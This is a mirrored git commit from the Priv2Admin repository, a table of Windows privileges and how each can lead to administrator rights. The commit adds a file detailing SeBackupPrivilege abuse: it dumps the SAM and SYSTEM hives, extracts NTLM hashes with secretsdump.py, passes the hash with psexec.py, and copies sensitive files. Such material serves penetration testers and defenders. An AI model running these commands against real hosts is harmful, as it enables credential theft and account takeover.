mirror of
https://github.com/gtworek/Priv2Admin
synced 2024-11-22 03:03:04 +00:00
Summarization of SeBackupPrivilege in the main table and details added to new file SeBackupPrivilege.md
This commit is contained in:
parent
57fef61cb9
commit
bc80e81240
2 changed files with 5 additions and 1 deletions
|
@ -26,7 +26,7 @@ Feel free to contribute and/or discuss presented ideas.
|
|||
| --- | --- | --- | --- | --- |
|
||||
|`SeAssignPrimaryToken`| ***Admin*** | 3rd party tool | *"It would allow a user to impersonate tokens and privesc to nt system using tools such as potato.exe, rottenpotato.exe and juicypotato.exe"* | Thank you [Aurélien Chalot](https://twitter.com/Defte_) for the update. I will try to re-phrase it to something more recipe-like soon. |
|
||||
|`SeAudit`| **Threat** | 3rd party tool | Write events to the Security event log to fool auditing or to overwrite old events. |Writing own events is possible with [`Authz Report Security Event`](https://docs.microsoft.com/en-us/windows/win32/api/authz/nf-authz-authzreportsecurityevent) API. |
|
||||
|`SeBackup`| ***Admin*** | 3rd party tool <br><br> Sensitive files access (in combination with `SeRestore`): <br> ***Built-in commands*** | 1. Enable the privilege in the token <br> 2. Export the `SAM` and `SYSTEM` registry hives:<br> `cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"` <br> 3. Eventually transfer the exported hives on a controlled computer <br> 4. Extract the local accounts hashes from the export `SAM` hive. For example using `Impacket`'s `secretsdump.py` Python script: <br> `secretsdump.py -sam SAM -system SYSTEM LOCAL` <br> 5. Authenticate as the local built-in `Administrator` using its `NTLM` hash (Pass-the-Hash). For example using `Impacket`'s `psexec.py` Python script: <br> `psexec.py -hashes ":<ADMINISTRATOR_NTLM>" <Administrator>@<TARGET_IP>` <br><br> Alternatively, can be used to read sensitive files with `robocopy /b` | - `User Account Control` may prevent Pass-the-Hash authentications with the local accounts but by default the built-in `Administrator` (RID 500) account is not concerned (as `FilterAdministratorToken` is disabled by default). <br><br> - Pass-the-Hash authentications can be attempted over (at least) the following services: `SMB` (port TCP 445), `SMB` over `NetBIOS` (port TCP 139), `WinRM` (ports TCP 5985 / 5986), or `RDP` if the `Restricted Admin` feature is enabled server side (port TCP 3389). <br><br> - Access to sensitive files may be more interesting if you can read `%WINDIR%\MEMORY.DMP`. <br><br> - `SeBackupPrivilege` is not helpful when it comes to open and write to files as it may only be used to copy files. <br><br> - Robocopy requires both `SeBackup` and `SeRestore` to work with the `/b` parameter (which are both granted to members of the `Backup Operators` group by default). <br> Instead, [`Copy-FileSeBackupPrivilege`](https://github.com/giuliano108/SeBackupPrivilege) can be used to backup files through a process with only the `SeBackup` privilege in its token: <br> `Import-Module .\SeBackupPrivilegeUtils.dll` <br> `Import-Module .\SeBackupPrivilegeCmdLets.dll` <br> `Set-SeBackupPrivilege` <br> `Copy-FileSeBackupPrivilege <SOURCE_FILE> <DEST_FILE>` |
|
||||
|`SeBackup`| ***Admin*** | 3rd party tool | 1. Backup the `HKLM\SAM` and `HKLM\SYSTEM` registry hives <br> 2. Extract the local accounts hashes from the `SAM` database <br> 3. Pass-the-Hash as a member of the local `Administrators` group <br><br> Alternatively, can be used to read sensitive files. | For more information, refer to the [`SeBackupPrivilege` file](SeBackupPrivilege.md). |
|
||||
|`SeChangeNotify`| None | - | - | Privilege held by everyone. Revoking it may make the OS (Windows Server 2019) unbootable. |
|
||||
|`SeCreateGlobal`| ? | ? | ? ||
|
||||
|`SeCreatePagefile`| None | ***Built-in commands*** | Create hiberfil.sys, read it offline, look for sensitive data. | Requires offline access, which leads to admin rights anyway. |
|
||||
|
@ -66,3 +66,4 @@ Feel free to contribute and/or discuss presented ideas.
|
|||
- [Aurélien Chalot](https://twitter.com/Defte_) - initial information about SeAssignPrimaryToken.
|
||||
- [vletoux](https://github.com/vletoux) - SeLoadDriver issue reporting.
|
||||
- [Walied Assar](https://twitter.com/waleedassar) - DoS with SeLockMemoryPrivilege and NtManagePartition()
|
||||
- [Qazeer](https://github.com/Qazeer) - SeBackupPrivilege exploitation details.
|
||||
|
|
3
SeBackupPrivilege.md
Normal file
3
SeBackupPrivilege.md
Normal file
|
@ -0,0 +1,3 @@
|
|||
| Privilege | Impact | Tool | Execution path | Remarks |
|
||||
| --- | --- | --- | --- | --- |
|
||||
|`SeBackup`| ***Admin*** | 3rd party tool <br><br> Sensitive files access (in combination with `SeRestore`): <br> ***Built-in commands*** | 1. Enable the privilege in the token <br><br> 2. Export the `HKLM\SAM` and `HKLM\SYSTEM` registry hives:<br> `cmd /c "reg save HKLM\SAM SAM & reg save HKLM\SYSTEM SYSTEM"` <br><br> 3. Eventually transfer the exported hives on a controlled computer <br><br> 4. Extract the local accounts hashes from the export `SAM` hive. For example using `Impacket`'s `secretsdump.py` Python script: <br> `secretsdump.py -sam SAM -system SYSTEM LOCAL` <br><br> 5. Authenticate as the local built-in `Administrator`, or another member of the local `Administrators` group, using its `NTLM` hash (Pass-the-Hash). For example using `Impacket`'s `psexec.py` Python script: <br> `psexec.py -hashes ":<ADMINISTRATOR_NTLM>" <Administrator>@<TARGET_IP>` <br><br> Alternatively, can be used to read sensitive files with `robocopy /b` | - `User Account Control` may prevent Pass-the-Hash authentications with the local accounts but by default the built-in `Administrator` (RID 500) account is not concerned (as `FilterAdministratorToken` is disabled by default). <br><br> - Pass-the-Hash authentications can be attempted over (at least) the following services: `SMB` (port TCP 445), `SMB` over `NetBIOS` (port TCP 139), `WinRM` (ports TCP 5985 / 5986), or `RDP` if the `Restricted Admin` feature is enabled server side (port TCP 3389). <br><br> - Access to sensitive files may be more interesting if you can read `%WINDIR%\MEMORY.DMP`. <br><br> - `SeBackupPrivilege` is not helpful when it comes to open and write to files as it may only be used to copy files. <br><br> - Robocopy requires both `SeBackup` and `SeRestore` to work with the `/b` parameter (which are both granted to members of the `Backup Operators` group by default). <br> Instead, [`Copy-FileSeBackupPrivilege`](https://github.com/giuliano108/SeBackupPrivilege) can be used to backup files through a process with only the `SeBackup` privilege in its token: <br> `Import-Module .\SeBackupPrivilegeUtils.dll` <br> `Import-Module .\SeBackupPrivilegeCmdLets.dll` <br> `Set-SeBackupPrivilege` <br> `Copy-FileSeBackupPrivilege <SOURCE_FILE> <DEST_FILE>` |
|
Loading…
Reference in a new issue